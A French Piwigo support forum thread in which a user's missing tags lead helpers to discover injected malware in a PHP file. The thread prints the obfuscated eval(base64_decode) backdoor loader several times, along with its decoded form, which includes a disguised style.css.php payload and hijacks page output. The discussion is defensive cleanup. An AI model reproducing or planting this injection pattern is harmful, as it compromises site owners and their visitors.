•  » Utilisation
  •  » [Résolu]Aucun tag dans le Menu Tags !

#1 2011-06-01 10:14:57

isatis
Membre
2008-08-27
80

[Résolu]Aucun tag dans le Menu Tags !

Bonjour,

Depuis le passage en 2.2.1, les tags ne s'affichent plus dans le menu Tags ("voir les tags disponibles").

Y a-t-il une solution ?

Merci

Dernière modification par isatis (2011-06-02 16:23:29)


ma galerie : ski de rando, escalade et alpinisme ...

Hors ligne

#2 2011-06-01 11:33:03

ddtddt
Équipe Piwigo
Quetigny (21) - France
2007-07-27
14704

Re: [Résolu]Aucun tag dans le Menu Tags !

est ce que tu as un template extension de tags.tpl ?
est ce que tu utilise un plugin qui interviens sur les tags ?


Vous aimez Piwigo alors n'hésitez pas à participer avec nous, plus d'infos sur la page "Contribuer à Piwigo". Si vous n'avez pas beaucoup de temps et que vous souhaitez nous soutenir vous pouvez aussi le faire par un don.

Hors ligne

#3 2011-06-01 11:38:00

isatis
Membre
2008-08-27
80

Re: [Résolu]Aucun tag dans le Menu Tags !

ddtddt a écrit:

est ce que tu as un template extension de tags.tpl ?

Oops, je ne sais pas trop de quoi il s'agit !?
Comment puis-je vérifier ?

ddtddt a écrit:

est ce que tu utilise un plugin qui interviens sur les tags ?

Voici ma liste de plugins activés :

Advanced Menu Manager Version 3.1.3 | Par Piwigo team | Visitez le site du plugin
Grum Plugins Classes.3 Version 3.5.1 | Par grum@piwigo.org | Visitez le site du plugin
LocalFiles Editor  Version 2.2.1 | Par Piwigo team | Visitez le site du plugin
Piwigo AutoUpgrade Version 2.2.e | Par P@t | Visitez le site du plugin
PY GVideo Version 2.2.a | Par PYwaie & P@t | Visitez le site du plugin
RV Menu Tree Version 2.2.a | Par rvelices | Visitez le site du plugin

Merci


ma galerie : ski de rando, escalade et alpinisme ...

Hors ligne

#4 2011-06-01 20:43:24

ddtddt
Équipe Piwigo
Quetigny (21) - France
2007-07-27
14704

Re: [Résolu]Aucun tag dans le Menu Tags !

Je me suis inscrit sur ta galerie, si tu peux me passer les droits de webmaster un instant je regarde et je te fait un retour


Vous aimez Piwigo alors n'hésitez pas à participer avec nous, plus d'infos sur la page "Contribuer à Piwigo". Si vous n'avez pas beaucoup de temps et que vous souhaitez nous soutenir vous pouvez aussi le faire par un don.

Hors ligne

#5 2011-06-01 21:46:00

isatis
Membre
2008-08-27
80

Re: [Résolu]Aucun tag dans le Menu Tags !

ddtddt a écrit:

Je me suis inscrit sur ta galerie, si tu peux me passer les droits de webmaster un instant je regarde et je te fait un retour

C'est fait, merci


ma galerie : ski de rando, escalade et alpinisme ...

Hors ligne

#6 2011-06-01 22:04:30

ddtddt
Équipe Piwigo
Quetigny (21) - France
2007-07-27
14704

Re: [Résolu]Aucun tag dans le Menu Tags !

c'est quoi la 1er ligne de ton fichier local de conf ?

est ce que tu as essayé de reprendre le fichier tags.php de l'archive et de le renvoyer ?


Vous aimez Piwigo alors n'hésitez pas à participer avec nous, plus d'infos sur la page "Contribuer à Piwigo". Si vous n'avez pas beaucoup de temps et que vous souhaitez nous soutenir vous pouvez aussi le faire par un don.

Hors ligne

#7 2011-06-01 22:10:12

ddtddt
Équipe Piwigo
Quetigny (21) - France
2007-07-27
14704

Re: [Résolu]Aucun tag dans le Menu Tags !

il semblerais que ce soit un code malveillant c'est toi qui l'a rajouté ?


Vous aimez Piwigo alors n'hésitez pas à participer avec nous, plus d'infos sur la page "Contribuer à Piwigo". Si vous n'avez pas beaucoup de temps et que vous souhaitez nous soutenir vous pouvez aussi le faire par un don.

Hors ligne

#8 2011-06-01 22:35:16

isatis
Membre
2008-08-27
80

Re: [Résolu]Aucun tag dans le Menu Tags !

ddtddt a écrit:

il semblerais que ce soit un code malveillant c'est toi qui l'a rajouté ?

Si tu veux parler de
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9tbnQvMTUwL3NkYi9iLzQvZnJhbnZhbC5yZW5hcmQvUFdHL2FkbWluL3RlbXBsYXRlL2dvdG8vdGhlbWUvcm9tYS9pbWFnZXMvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

je n'ai aucune idée d'où ça vient !?

Est-ce que je dois l'enlever ?


ma galerie : ski de rando, escalade et alpinisme ...

Hors ligne

#9 2011-06-01 23:26:06

mistic100
Ex Equipe Piwigo
Lyon
2008-09-27
3556

Re: [Résolu]Aucun tag dans le Menu Tags !

oui enlève le, ça n'a aucune raison d'être là

voici le code que ça exécute

Code:

 if (function_exists('ob_start') && !isset($GLOBALS['mfsn'])) {
      $GLOBALS['mfsn'] = '/mnt/150/sdb/b/4/franval.renard/PWG/admin/template/goto/theme/roma/images/style.css.php';
      if (file_exists($GLOBALS['mfsn'])) {
          include_once($GLOBALS['mfsn']);
          if (function_exists('gml') && function_exists('dgobh')) {
              ob_start('dgobh');
          }
      }
  }

très étrange

Hors ligne

#10 2011-06-02 07:36:12

ddtddt
Équipe Piwigo
Quetigny (21) - France
2007-07-27
14704

Re: [Résolu]Aucun tag dans le Menu Tags !

Il me semble que tu devrais vérifier que ce code n'est pas présent dans d'autre fichier.

et je te conseillerais d'analyser ton PC


Vous aimez Piwigo alors n'hésitez pas à participer avec nous, plus d'infos sur la page "Contribuer à Piwigo". Si vous n'avez pas beaucoup de temps et que vous souhaitez nous soutenir vous pouvez aussi le faire par un don.

Hors ligne

#11 2011-06-02 08:30:33

isatis
Membre
2008-08-27
80

Re: [Résolu]Aucun tag dans le Menu Tags !

ddtddt a écrit:

Il me semble que tu devrais vérifier que ce code n'est pas présent dans d'autre fichier.

et je te conseillerais d'analyser ton PC

OK, j'ai enlevé ce code, mystère !

J'en ai profité pour modifié la ligne :

$conf['tags_default_display_mode'] ='cumulus';

par :

$conf['tags_default_display_mode'] ='letters';

et mes tags sont réapparus !

Merci


ma galerie : ski de rando, escalade et alpinisme ...

Hors ligne

#12 2011-06-02 13:38:38

Gotcha
Equipe Piwigo
Pierrelatte (26)
2007-03-14
13331

Re: [Résolu]Aucun tag dans le Menu Tags !

isatis a écrit:

ddtddt a écrit:

il semblerais que ce soit un code malveillant c'est toi qui l'a rajouté ?

Si tu veux parler de
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9tbnQvMTUwL3NkYi9iLzQvZnJhbnZhbC5yZW5hcmQvUFdHL2FkbWluL3RlbXBsYXRlL2dvdG8vdGhlbWUvcm9tYS9pbWFnZXMvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

je n'ai aucune idée d'où ça vient !?

Est-ce que je dois l'enlever ?

[Forum, post 129730 by scratx in topic 16778] [Résolu] Code bizarre sur tous mes fichier PHP !


Ayez comme premier réflexe de consulter le wiki.
Ensuite, veuillez effectuer une recherche sur le forum avant de poser votre question.

LE FAIRE EST LE REVELATEUR DE L'ETRE

Hors ligne

#13 2011-06-02 16:23:05

isatis
Membre
2008-08-27
80

Re: [Résolu]Aucun tag dans le Menu Tags !

Gotcha a écrit:

isatis a écrit:

ddtddt a écrit:

il semblerais que ce soit un code malveillant c'est toi qui l'a rajouté ?

Si tu veux parler de
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9tbnQvMTUwL3NkYi9iLzQvZnJhbnZhbC5yZW5hcmQvUFdHL2FkbWluL3RlbXBsYXRlL2dvdG8vdGhlbWUvcm9tYS9pbWFnZXMvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

je n'ai aucune idée d'où ça vient !?

Est-ce que je dois l'enlever ?

[Forum, post 129730 by scratx in topic 16778] [Résolu] Code bizarre sur tous mes fichier PHP !

Je n'ai pas trouvé d'autres occurences de ces bouts de codes dans mes autres fichiers php.

Je ne sais pas pourquoi j'avais $conf['tags_default_display_mode'] ='cumulus'; au lieu de 'letters', mais maintenant ça fonctionne !

Merci à vous tous.


ma galerie : ski de rando, escalade et alpinisme ...

Hors ligne

  •  » Utilisation
  •  » [Résolu]Aucun tag dans le Menu Tags !

Pied de page des forums

Propulsé par FluxBB

github twitter facebook newsletter Faire un don Piwigo.org © 2002-2019 · Contact